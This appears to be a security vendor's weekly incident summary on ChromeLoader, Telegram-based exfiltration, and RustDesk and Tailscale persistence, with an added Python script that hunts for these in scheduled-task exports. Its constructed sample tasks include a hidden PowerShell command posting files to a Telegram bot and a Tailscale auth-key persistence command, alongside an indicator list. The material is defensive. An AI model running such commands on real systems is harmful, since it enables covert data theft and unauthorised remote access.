Between May 15 and 22, 2024, Blackpoint’s Security Operations Center (SOC) responded to 113 incidents in total: 27 on-premises MDR incidents, no Cloud Response incidents for Google Workspace, and 86 Cloud Response incidents for Microsoft 365. These involved confirmed or likely threat actor use of:
- Multiple ChromeLoader attacks across Financial, Retail, Government, and Healthcare industry partners for information theft, including credential harvesting;
- Telegram messenger and scheduled tasks for command and control, persistence, and exfiltration; and
- RustDesk and Tailscale for persistence.
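Two of the three techniques above (scheduled tasks for persistence and command and control, and RustDesk or Tailscale installed for persistence) leave a footprint in the Task Scheduler that can be hunted with tooling most partners already have. The following is an added example, not Blackpoint’s code or tooling: it takes Task Scheduler XML exports (what `Export-ScheduledTask` or `schtasks /query /xml` produce), pulls out every `<Exec>` action and its trigger types, and flags command lines that reference the Telegram Bot API host, RustDesk, or Tailscale. The indicator substrings, the task names, and the sample exports (with placeholder tokens) are all constructed for the example.

```python
from __future__ import annotations

import re
import xml.etree.ElementTree as ET

# Fixed namespace used by Windows Task Scheduler XML exports.
TASK_NS = {"t": "http://schemas.microsoft.com/windows/2004/02/mit/task"}

# Assumed indicator substrings for the tooling named in the summary;
# matched case-insensitively against each action's full command line.
INDICATORS = {
    "telegram_c2_exfil": ("api.telegram.org",),
    "rustdesk_persistence": ("rustdesk",),
    "tailscale_persistence": ("tailscale",),
}

_XML_DECL = re.compile(r"^\s*<\?xml[^>]*\?>")


def parse_task(task_xml: str) -> ET.Element:
    """Parse one task export already decoded to str. schtasks writes UTF-16;
    the declaration describes the original bytes, not the decoded str, so it is
    dropped before parsing."""
    return ET.fromstring(_XML_DECL.sub("", task_xml, count=1))


def task_command_lines(root: ET.Element) -> list[str]:
    """One command line (Command plus Arguments) per <Exec> action."""
    lines = []
    for exec_node in root.iterfind(".//t:Actions/t:Exec", TASK_NS):
        cmd = exec_node.findtext("t:Command", default="", namespaces=TASK_NS)
        args = exec_node.findtext("t:Arguments", default="", namespaces=TASK_NS)
        lines.append(f"{cmd} {args}".strip())
    return lines


def task_triggers(root: ET.Element) -> list[str]:
    """Trigger element names (LogonTrigger, BootTrigger, CalendarTrigger, ...)."""
    triggers = root.find("t:Triggers", TASK_NS)
    if triggers is None:
        return []
    return [child.tag.rsplit("}", 1)[-1] for child in triggers]


def classify(command_line: str) -> list[str]:
    """Indicator labels whose substrings occur in the command line."""
    lowered = command_line.lower()
    return [label for label, needles in INDICATORS.items()
            if any(n.lower() in lowered for n in needles)]


def hunt(tasks: dict[str, str]) -> list[dict]:
    """tasks maps task path -> XML export text; one finding per matching action."""
    findings = []
    for path, xml_text in tasks.items():
        root = parse_task(xml_text)
        triggers = task_triggers(root)
        for cmd in task_command_lines(root):
            labels = classify(cmd)
            if labels:
                findings.append({"task": path, "command": cmd,
                                 "triggers": triggers, "labels": labels})
    return findings


def _task(cmd: str, args: str, trigger_xml: str) -> str:
    # Builds a minimal, constructed task export in the real schema layout.
    return f"""<?xml version="1.0" encoding="UTF-16"?>
<Task version="1.2" xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Triggers>{trigger_xml}</Triggers>
  <Actions Context="Author">
    <Exec><Command>{cmd}</Command><Arguments>{args}</Arguments></Exec>
  </Actions>
</Task>"""


# Constructed sample exports: one benign built-in task and three modelled on
# the techniques in the summary. Tokens and keys are placeholders.
SAMPLE_TASKS = {
    r"\Microsoft\Windows\DiskCleanup\SilentCleanup": _task(
        r"C:\Windows\System32\cleanmgr.exe", "/autoclean",
        "<CalendarTrigger><StartBoundary>2024-05-15T03:00:00</StartBoundary></CalendarTrigger>"),
    r"\OneDriveSync": _task(
        "powershell.exe",
        "-NoP -W Hidden -c Invoke-RestMethod -Uri https://api.telegram.org/bot123:PLACEHOLDER/sendDocument -Method Post",
        "<LogonTrigger><Enabled>true</Enabled></LogonTrigger>"),
    r"\RustDesk": _task(
        r"C:\Program Files\RustDesk\rustdesk.exe", "--service",
        "<BootTrigger><Enabled>true</Enabled></BootTrigger>"),
    r"\Updater": _task(
        r"C:\Program Files\Tailscale\tailscale.exe",
        "up --authkey tskey-auth-PLACEHOLDER --unattended",
        "<LogonTrigger><Enabled>true</Enabled></LogonTrigger>"),
}


if __name__ == "__main__":
    for f in hunt(SAMPLE_TASKS):
        print(f"{f['task']}: {', '.join(f['labels'])} via {f['triggers']} -> {f['command']}")
```

To run this against a live host, collect exports with `Get-ScheduledTask | ForEach-Object { $_ | Export-ScheduledTask }` and feed the decoded text into `hunt`. A task name that imitates a legitimate product (the constructed `\OneDriveSync` above) is exactly why the match is made on the action's command line rather than on the task name, and the trigger list is kept in the finding because logon and boot triggers are what turn a one-off task into persistence.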
In this blog, we’ll dive into the details behind these select incidents, including why partners need to account for them today – even if they haven’t been attacked yet! – as well as possible mitigations that leverage your current tech stack and Blackpoint Cyber.